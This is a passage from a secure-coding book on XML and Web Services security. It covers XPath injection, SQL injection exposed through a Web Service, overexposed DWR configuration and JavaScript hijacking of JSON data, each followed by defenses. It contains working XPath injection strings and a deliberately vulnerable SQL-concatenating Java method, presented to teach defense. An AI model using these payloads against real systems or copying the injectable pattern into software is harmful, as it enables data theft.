time by changing the id field. ' or .=//orders/order[1] and 'a' = 'a strawberry ' or .=//orders/order[2] and 'a' = 'a vanilla ' or .=//orders/order[3] and 'a' = 'a chocolate ' or .=//orders/order[4] and 'a' = 'a chocolate Readers who are both familiar with XPath attacks and generally impatient might be asking why we can’t read all the order nodes out of the document in one fell swoop. The problem is that the call to XPath.evaluate() used in this example will return only the contents of a single node, not a list of nodes, so we need to make a separate query for each piece of data we want to retrieve. Attackers aren’t limited to retrieving just the contents of the orders; they can access the names and IDs, too. The following value for the id parameter will return the name attribute of the first order tag: ' or .=//orders/order[1]]/@name['a'='a Similarly, the following value for id will retrieve the id attribute of the first order tag: ' or .=//orders/order[1]]/@id['a'='a Defending against XPath injection also bears a great deal of resemblance to defending against SQL injection. Just as with SQL injection, the heart of the problem is that the program allows attackers to mix data and control logic. You could try to alter the parameter values to escape potentially dangerous characters, but anything you overlook will be trouble. A better approach is to make a clear distinction between data and control by using XPath variables. XPath variables take a little more setup to use than SQL 10.1 Working with XML 365 bind variables require, but the setup can be captured in a small helper class, shown in Example 10.6. Example 10.6 A helper class for binding XPath variables. public static class XPathBindVariables implements javax.xml.xpath.XPathVariableResolver { HashMap vMap = new HashMap(); public void bindVar(String var, Object value) { vMap.put(var, value); } public Object resolveVariable(QName qName) { return vMap.get(qName.getLocalPart()); } } The XPathBindVariables class stores a map between the names of the bind variables and their values. The resolveVariable() method allows the class to implement the interface required to make the map accessible to the object that carries out the XPath query. The flavorQuery() method can now be rewritten to use XPath variables, as shown in Example 10.7. Lines that have changed are in bold. Example 10.7 A rewritten version of flavorQuery avoids injection attacks by using XPath variables. public String flavorQuery(String id, String name, String xmlFile) throws XPathExpressionException { XPathFactory xfac = XPathFactory.newInstance(); XPath xp = xfac.newXPath(); InputSource input = new InputSource(xmlFile); XPathBindVariables bv = new XPathBindVariables(); xp.setXPathVariableResolver(bv); bv.bindVar("ID", id); bv.bindVar("NAME", name); String query = "//orders/order[@id=$ID and @name=$NAME]"; xp.evaluate(query, input); return xp.evaluate(query, input); } 366 Chapter 10 XML and Web Services Now there is no need to trust (or to validate) the values of id and name. Regardless of the values, the query will carry out the expected logic. 10.2 Using Web Services The most cynical among the software security crowd see Web Services as nothing more than a way to bypass the restrictions firewalls impose. In the bad old days, administrators could use a firewall to regulate network applications by controlling which ports were open to the outside world. This worked because most applications communicated on different ports. (Firewall rules could specify that inbound SMTP is okay, but no Telnet, and certainly no speaking the Network File System (NFS) protocol with the Internet at large.) Because all Web Services traffic can easily flow over port 80, there is no need to go talk to the network administrator to introduce a new application. We stop short of accusing anyone of harboring ulterior motives, but it is certainly true that uttering “Web Services” is the tersest verbiage one might use to explain why installing a firewall is an insufficient security plan. Proponents of Web Services are certainly aware that security is a concern, but they often fall into the trap of equating security features with secure features. In this vein, a favorite excuse for an otherwise insecure Web Services implementation is the use of the WS-* family of standards, which were created to address security features such as authentication, authorization, encryption, and digital signatures. Specialized software (and hardware) exists to broker Web Services transactions to make all these details easy for the application developer. Of course, even if all the security features are done right, there is still plenty of room for security mishaps in the form of defects and surprises buried in the code that has been Web Service–enabled. In keeping with the theme of the book, we do not discuss Web Services security features. Instead, we focus on all the security problems that occur in the code that isn’t focused on security. Input Validation Web Services frameworks try to make it as easy as possible to push a button and get a Web Service. Here’s how the Apache Axis project describes getting started in creating a SOAP-enabled Web Service [Axis, 2007]. 10.2 Using Web Services 367 Let’s say we have a simple class like the following: public class Calculator { public int add(int i1, int i2) { return i1 + i2; } public int subtract(int i1, int i2) { return i1 - i2; } } How do we go about making this class available via SOAP? There are a couple of answers to that question, but we begin with the easiest way Axis provides to do this, which takes almost no effort at all! JWS (Java Web Service) Files—Instant Deployment OK, here’s step 1: copy the above .java file into your webapp directory, and rename it Calculator.jws. So you might do something like this: % copy /axis/Calculator.jws Now for step 2…. Wait a minute, you’re done! You should now be able to access the service at the following URL (assuming your Axis web application is on port 8080): http://localhost:8080/axis/Calculator.jws. So it’s easy to expose methods that might have previously been the “guts” of the application. But if those guts contain vulnerabilities that were previously mitigated by the outer layer of code, the system is now vulnerable. Consider Example 10.8. It’s a method taken from DionySOA, a project that advertises itself as a Reseller/Broker service platform built using SOA and Web Services. The method is exposed through a Web Service. (You get a hint that it might be externally accessible when you see that it throws java.rmi.RemoteException. Knowing for sure requires looking at the application’s configuration files.) The method contains a blatant SQL injection vulnerability. It concatenates a user-controlled parameter into a SQL query string and executes the query. Although it is possible to make this kind of mistake without any Web Services in sight, we can’t help but believe that the Web Services setup made it easier to forget about 368 Chapter 10 XML and Web Services input validation because it makes input arriving from a potentially untrusted source less obvious, Example 10.8 SQL injection as a Web Service. public supplier.model.SupplierProduct[] searchName( java.lang.String in0) throws java.rmi.RemoteException { System.out.println("searchName("+in0+")"); String query="SELECT * FROM products " + " WHERE name like '"+in0+"' "; return this.doSQL(query); } Similarly, if a newly exposed method relies on another part of the application to perform access control checks, the Web Services interface can now bypass those checks, making it easy to lose track of the trust boundary. There’s nothing fundamentally wrong with making it easy to create a Web Service, but creating a good Web Service is really not so easy. The Web Services frameworks we are aware of do not give a programmer any guidance about the security implications that might be involved in exposing the insides of a program. WSDL Worries WSDL stands for Web Services Description Language, a language for explaining how to access Web Services. Some Web Services frameworks automatically generate a WSDL file that includes a description for all the methods they expose. The advantage to publishing a WSDL file is that it makes your Web Services “discoverable”; other programs can automatically determine how to invoke your Web Services without requiring a programmer to interpret any documentation. The disadvantage to publishing a WSDL file is that it makes your Web Services “discoverable”; it provides attackers with a map of potential targets you have exposed. A publicly available WSDL file makes it easier for a fuzzing tool to attack your application. It makes it easy for a human to assess whether you have inadvertently exposed any methods that should have remained private. (Imagine an attacker’s delight when he comes across a WSDL entry for the method makeMeTheAdminstrator().) 10.2 Using Web Services 369 We recommend against publishing a WSDL file for all to see. Instead, share the WSDL file only with people you trust. Hiding your WSDL file won’t make your Web Services secure, but it could force your attackers to work a bit harder. Over Exposure Web Services frameworks are driven by one or more configuration files that bind requests from the network to the objects and methods in the program. If the configuration and the code get out of sync, the program could expose more functionality than it should. Direct Web Remoting (DWR) is a popular Java framework for writing Asynchronous JavaScript and XML (Ajax) applications. DWR makes it easy for programmers to access server-side Java from client-side JavaScript code. Consider the DWR configuration file in Example 10.9. You can see that it exposes a class named AccountDAO and specifically excludes the method setOwner from being remotely accessible. What you can’t see is that DWR has implemented a blacklist. As soon as one tag is present, any method that isn’t explicitly forbidden becomes remotely accessible. Using exclusion tags, every time a programmer writes a method, he must remember to consider the implications of exposing the method. You can use tags instead, in which case DWR will build a whitelist. That’s good, but if you don’t specify any tags or any tags, DWR defaults to exposing everything. It’s a configuration disaster waiting to happen. Our understanding is that the DWR team recognizes this problem and is planning to address it in a future release. Example 10.9 DWR forces administrators to create a blacklist of methods that should not be exposed. Uh-oh. ... 370 Chapter 10 XML and Web Services Static Analysis: Find the Entry Points Static analysis tools should taint input parameters to methods that can be invoked through Web Service calls—these are methods that an attacker can control. For DWR, this means parsing the DWR configuration file and turning tags into entrypoint rules. For the DWR configuration in Example 10.9, a static analysis tool should infer this rule: Entry point rule: Method: all methods in AccountDAO except in setOwner() Precondition: All method arguments are tainted New Opportunities for Old Errors As with almost any new style of programming, Web Services make it possible for programmers to rediscover old errors. For example, some Web Services containers automatically include a stack trace as part of a failure message unless they are specifically configured not to do so; you can see examples of this in the “Error Handling” section of Chapter 9, “Web Applications.” Or programmers might rediscover the need for session management and once again fall into all the session management traps also covered in Chapter 9. The situation is exacerbated by the fact that the security requirements for a Web Service are often ambiguous. Web Services are supposed to be flexible so that other programmers can use them to assemble applications that the creator of the Web Service might not have envisioned, but this makes it difficult for a Web Service to understand the security needs of its callers. What sort of output validation should a Web Service perform? If the Web Service is intended to be used directly by a Web browser, it should take precautions to prevent cross-site scripting. But if the author of a Web Service doesn’t know how it will be used, it’s hard to make the right security decisions. JavaScript Hijacking: A New Frontier2 From a server’s perspective, Ajax Web applications make a Web browser look like a web services client. Instead of the Web browser requesting entire 2. This section began as a white paper co-authored with Yekaterina Tsipenyuk O’Neil. 10.2 Using Web Services 371 HTML pages, the browser makes a set of requests for smaller and more specific pieces of information. These requests look much like Web Services calls. Without making an effort to prevent it, many Ajax implementations leave the door open for attackers to steal data using these calls: we term this attack JavaScript hijacking. The X in Ajax is a bit deceptive. Instead of XML, a large number of Ajax applications communicate using JavaScript syntax, the most popular form of which is JavaScript Object Notation (JSON). Unless they implement specific countermeasures against it, many Web applications that transport data using JavaScript syntax allow attackers to read confidential data using a technique similar to the one commonly used to create mash-ups. Normally, Web browsers enforce the Same Origin Policy in order to protect the confidentiality of user data. The Same Origin Policy requires that, in order for JavaScript to access the contents of a Web page, both the JavaScript and the Web page must originate from the same domain. Without the Same Origin Policy, a malicious website could serve up JavaScript that loads sensitive information from other websites using a client’s credentials, cull through it, and communicate it back to an attacker. JavaScript hijacking allows the attacker to bypass the Same Origin Policy in the case that a Web application serves up JavaScript to communicate confidential information. The loophole in the Same Origin Policy is that it allows JavaScript from any website to be included and executed in the context of any other website. Even though a malicious site cannot directly examine any data loaded from a vulnerable site on the client, it can still take advantage of this loophole by setting up an environment that allows it to witness the execution of the JavaScript and any relevant side effects it may have. This is not a problem for non-Ajax web sites because they generally don’t communicate confidential data in JavaScript. The code in Example 10.10 implements the client-side of a legitimate JSON interaction from a Web application designed to manage sales leads. (Note that this example is written for Mozilla-based browsers.) Example 10.10 JavaScript client that requests data from a server and evaluates the result as JSON. var object; var req = new XMLHttpRequest();"GET", "/object.json",true); req.onreadystatechange = function () { if (req.readyState == 4) { Continues 372 var txt = req.responseText; object = eval("(" + txt + ")"); req = null; } }; req.send(null); Chapter 10 XML and Web Services When the code runs, it generates an HTTP request that looks like this (we have elided HTTP headers that are not directly relevant to this explanation): GET /object.json HTTP/1.1 ... Host: Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR The server responds with an array in JSON format: HTTP/1.1 200 OK Cache-control: private Content-Type: text/javascript; charset=utf-8 ... [{"fname":"Brian", "lname":"Chess", "phone":"6502135600", "purchases":60000.00, "email":"" }, {"fname":"Jacob", "lname":"West", "phone":"6502135600", "purchases":45000.00, "email":"" }] In this case, the JSON contains a list of confidential sales leads associated with the current user. Other users cannot access this information without knowing the user’s session identifier. However, if a victim visits a malicious site, the malicious site can retrieve the information using JavaScript hijacking. Example 10.11 shows malicious code that an attacker could use to steal the sensitive lead information intended for the client in Example 10.10. (Note that this code is also specific to Mozilla-based browsers. Other mainstream browsers do not allow native constructors to be overridden when objects are created without the use of the new operator.) If a victim can be tricked into visiting a Web page that contains this malicious code, the victim’s lead information will be sent to the attacker. 10.2 Using Web Services 373 Example 10.11 Malicious code that mounts a JavaScript hijacking attack against the application referenced in Example 10.10. The last line of malicious code uses a script tag to include the JSON object in the current page. The Web browser will send up the appropriate session cookie with this script request. In other words, this request will be handled just as though it had originated from the legitimate application. When the JSON arrives on the client, it will be evaluated in the context of the malicious page. This attack will fail if the top-level JSON data structure is an object instead of an array because stand-alone object declarations do not parse as valid JavaScript. However, attacks are not limited to JSON. Any data transported in notation that parse as valid JavaScript can be vulnerable. In order to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to create new objects. In this way, the malicious code has inserted a hook that allows it to get access to the creation of each object and transmit the object’s contents back to the malicious site. Other techniques for intercepting sensitive data have also proven 374 Chapter 10 XML and Web Services successful. Jeremiah Grossman overrode the default constructor for arrays to demonstrate an exploit for one of the first widely-discussed JavaScript hijacking vulnerabilities, which he discovered in a Google application [Grossman, 2006]. First-generation Web applications are not vulnerable to JavaScript hijacking, because they typically transmit data in HTML documents, not as pure JavaScript. If a Web application contains an exploitable cross-site scripting vulnerability, it cannot defeat data stealing attacks such as JavaScript hijacking, because cross-site scripting allows an attacker to run JavaScript as though it originated from the vulnerable application’s domain. The contrapositive does not hold—if a Web application does not contain any cross-site scripting vulnerabilities, it is not necessarily safe from JavaScript hijacking. For Web 2.0 applications that handle confidential data, there are two fundamental ways to defend against JavaScript hijacking: • Decline malicious requests • Prevent direct execution of the JavaScript response The best way to defend against JavaScript hijacking is to adopt both defensive tactics. Declining Malicious Requests From the server’s perspective, a JavaScript hijacking attack looks like an attempt at cross-site request forgery, and defenses against cross-site request forgery will also defeat JavaScript hijacking attacks. In order to make it easy to detect malicious requests, include a parameter that is hard for an attacker to guess in every request. One way to accomplish this is to add the session cookie as a request parameter, as shown in Example 10.12. When the server receives such a request, it can check to be certain the session identifier matches the value in the request parameter. Malicious code does not have access to the session cookie (cookies are also subject to the Same Origin Policy), so there is no easy way for the attacker to craft a request that will pass this test. A different secret can also be used in place of the session cookie. As long as the secret is hard to guess and appears in a context that is accessible to the legitimate application and not accessible from a different domain, it will prevent an attacker from making a valid request. 10.2 Using Web Services 375 Example 10.12 JavaScript code that submits the session cookie as a request parameter with an HTTP request. var httpRequest = new XMLHttpRequest(); ... var cookies="cookies="+escape(document.cookie);'POST', url, true); httpRequest.send(cookies); Alternate approaches for declining malicious requests include checking the HTTP referer header and not responding to GET requests. Historically, the referer header has not been reliable, so we do not recommend using it as the basis for any security mechanisms. Not responding to GET requests is a defensive technique because the